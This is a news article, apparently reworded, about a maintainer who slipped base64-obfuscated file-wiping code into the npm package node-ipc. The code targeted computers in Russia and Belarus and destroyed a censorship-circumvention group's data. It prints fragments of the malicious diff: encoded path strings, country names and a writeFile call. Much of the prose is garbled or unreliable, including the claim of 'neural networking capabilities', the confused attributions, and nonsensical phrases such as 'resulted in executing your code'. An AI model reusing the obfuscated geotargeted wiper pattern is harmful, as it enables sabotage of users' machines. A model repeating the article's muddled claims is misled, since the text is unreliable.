Sabotage: Code added to popular NPM package wiped files in Russia and Belarus

The developer of a popular open source package has been caught adding malicious code to it, leading to wiped files on computers located in Russia and Belarus. The move was part of a protest that has enraged many users and raised concerns about the safety of free and open source software.

The application adds remote interprocess communication and neural networking capabilities to other open source code libraries. One of the libraries that has more than 1 million weekly downloads is Vue.js CLI.

A deliberate and dangerous act

Two weeks ago, the author of the library pushed a new version that sabotaged computers in Russia and other countries, as well as providing support for the invasion of Ukraine. The new release added a function to check the address of developers who used the node.iPC in their own projects. The new version wiped the files from the machine and replaced them with a heart symbol.

Brandon Nozaki Miller base-64-encoded the changes to make it harder for users to visually inspect them to check for problems.

This is what the developers saw.

+      const n2 = Buffer.from("Li8=", "base64");
+      const o2 = Buffer.from("Li4v", "base64");
+      const r = Buffer.from("Li4vLi4v", "base64");
+      const f = Buffer.from("Lw==", "base64");
+      const c = Buffer.from("Y291bnRyeV9uYW1l", "base64");
+      const e = Buffer.from("cnVzc2lh", "base64");
+      const i = Buffer.from("YmVsYXJ1cw==", "base64");

The lines were passed to the timer function.

+          h(n2.toString("utf8"));

The Base64 strings had values.

  • n2 is set to: ./
  • o2 is set to: ../
  • r is set to: ../../
  • f is set to: /

When passed to the timer function, the lines were used as inputs to wipe files and replace them with the heart symbol.

Advertisement
+      try {
+        import_fs3.default.writeFile(i, c.toString("utf8"), function() {
+        });

A critical supply chain security incident will occur for any system on which this npm package will be called upon, if that matches the location of either Russia or Belarus, wrote Liran Tal.

Tal found that the author of the node.iPC has 40 other libraries, some of which are also dependencies for other open source packages. Tal questioned the wisdom of the protest and its likely ramifications for the open source community as a whole.

Even if the deliberate and dangerous act of maintainer RIAEvangelist will be perceived by some as a legitimate act of protest, how does that reflect on the maintainer's future reputation and stake in the developer community?

Gone forever

In open source forums, RIAEvangelist came under fire. The new malicious code release resulted in executing your code and wiping over 30,000 messages and files detailing war crimes committed in Ukraine by the Russian army and government.

The person who took down the post and re-posted it here said that the purpose of the Belarussian server was to circumvent censorship in that country. The organization's personnel had already been stretched thin since Russia began its invasion of Ukraine, and for reasons that aren't clear, messages from front-line soldiers and other sensitive data was likely gone forever.

The person wrote that the shenanigan did more damage to them than Putin or Lukashenka. Our counsel suggested that we file criminal charges in federal court.